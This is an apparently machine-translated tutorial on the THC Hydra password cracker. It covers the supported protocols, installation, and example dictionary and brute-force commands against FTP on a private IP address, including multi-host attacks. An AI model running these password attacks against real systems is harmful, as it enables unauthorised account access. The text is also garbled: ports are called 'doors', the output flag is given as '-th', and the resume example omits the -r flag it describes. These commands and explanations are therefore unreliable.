THC Hydra password cracker: If you are dealing with its space security, then you probably haven't heard of THC Hydra. It is one of the most well known and effective password crackers while offering its users the opportunity to discover how they can protect their passwords from relevant attacks.
It's fast, flexible, and easily configurable. Unlike other password crackers, it supports a wide range of protocols such as:
- Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP,
- HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST,
- HTTPS-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
- HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP,
- Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec,
- Rlogin, Rsh, RTSP, SAP / R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1 + v2 + v3, SOCKS5,
- SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
How to install it
|$ git clone https://github.com/vanhauser-thc/thc-hydra
$ cd thc-hydra /
$ Make install
In Debian / Ubuntu versions to install the required libraries run the following command:
|apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \ libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \ firebird-dev libncp-dev|
How to use it
To see all the available tool commands, type hydra in a terminal.
|hydra [[[-l LOGIN | -L FILE] [-p PASS | -p FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-w TIME] [-f TIME] [-f] [-s PORT] [-x MIN: MAX: CHARSET] [-SuvV46] [service: // server [: PORT] [/ OPT]]|
Examples of different commands you can run, depending on the attack protocol, can be found below:
Find a password for a specific username
As we have already mentioned, Hydra is a very powerful tool, capable of working together with different protocols. For example, if you want to crack the ftp password for a specific username, you can use dictionary attack. These attacks usually use a dictionary / dictionaries containing the passwords most frequently chosen by users, as well as a multitude of alphabet words. The -l parameter is used to declare a specific username and -p to declare the dictionary file:
|hydra -l raj -P pass.txt 192.168.1.108 ftp|
Find a username for a specific password
In the opposite case, where you own it password and you want to check which username (for ftp service or some other) corresponds you can use the same dictionary attack technique:
|hydra -L user.txt -p 123 192.168.1.108 ftp|
Find a username and password
Combined, if you want to find a username and password (for ftp service or some other) you can run the following again with the technique dictionary attack. The -L parameter activates the dictionary mode for possible usernames and -P for possible passwords.
|hydra -L user.txt -P pass.txt 192.168.1.108 ftp|
Save result to disk
For maintenance and reading purposes, you can record the results of the Hydra commands in a file. For this reason, use the -th parameter and then the desired file title:
|hydra -L user.txt -P pass.txt 192.168.1.108 ftp -o result.txt|
Continuing the attack
Many times an attack can be stopped or a block canceled, so using the -r parameter you can continue the attack by running the last failed command instead of starting at the beginning:
|hydra -L user.txt -P pass.txt 192.168.1.108 ftp
Attack on a specific door
Network admins often change the number of one service door to another. In the previous cases where we looked at ftp service, Hydra ran the attack on the 21 door, its default door ftp.
However, by using the -s parameter you can run the attack by selecting the number of the door you want to control, not the default service door:
|hydra -L user.txt -P pass.txt 192.168.1.108 ftp -s 2121|
Attack on many hosts
To run dictionary attack on usernames and passwords for multiple hosts on network, select the -M parameter. This parameter allows you to set a list of multiple hosts to attack:
|hydra -L user.txt -P pass.txt -M hosts.txt ftp|
The -F parameter will allow you to end an attack on multiple targets only in the first match:
|hydra -L user.txt -P pass.txt -M hosts.txt ftp -V -F|
How did the Hydra password cracker look like? Will you try it?